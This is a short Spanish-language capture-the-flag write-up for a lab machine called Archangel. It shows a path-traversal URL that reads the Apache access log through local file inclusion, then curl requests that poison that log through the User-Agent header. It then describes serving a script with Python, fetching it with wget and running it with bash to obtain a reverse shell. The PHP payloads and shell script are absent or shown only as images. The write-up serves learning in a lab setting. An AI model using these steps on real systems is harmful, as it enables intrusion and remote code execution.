La máquina [[MAQUINA ARCHANGEL (Fuzzing, Local File Inclusion con wrappers, log poissoning y manipulación del PATH)]] tiene esta vulnerabilidad en esta ruta: http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././../././var/log/apache2/access.log {{pasted_image_20230625161757.png|}} Por tanto, una vez visto esto, podemos intentar hacer un log poisoning, de tal forma que si probamos en ejecutar una petición con curl podemos inyectar texto dentro del apartado del user agent: curl -s -X GET 'http://mafialive.thm' -H 'User-Agent:Pruebas' {{pasted_image_20230706193634.png|}} Pero ahora si dentro del user-agent inyectamos un código php malicioso para ejecutar comandos, veremos que funciona: curl -s -X GET 'http://mafialive.thm' -H "User-Agent: " {{pasted_image_20230706193823.png|}} Una vez hecho esto, montamos un servidor http con python y nos compartimos un fichero para enviarnos una reverse shell: {{pasted_image_20230706195814.png|}} {{pasted_image_20230706195824.png|}} Y entonces ahora ejecutamos el comando wget para obtener este archivo y después bash pwned.sh para ejecutarlo y recibir la reverse shell: curl -s -X GET 'http://mafialive.thm' -H "User-Agent: " curl -s -X GET 'http://mafialive.thm' -H "User-Agent: " curl -s -X GET 'http://mafialive.thm' -H "User-Agent: " Una vez ejecutado lo anterior, refrescamos y habremos recibido la reverse shell: {{pasted_image_20230706200246.png|}} Y habremos recibido la reverse shell: {{pasted_image_20230706200000.png|}}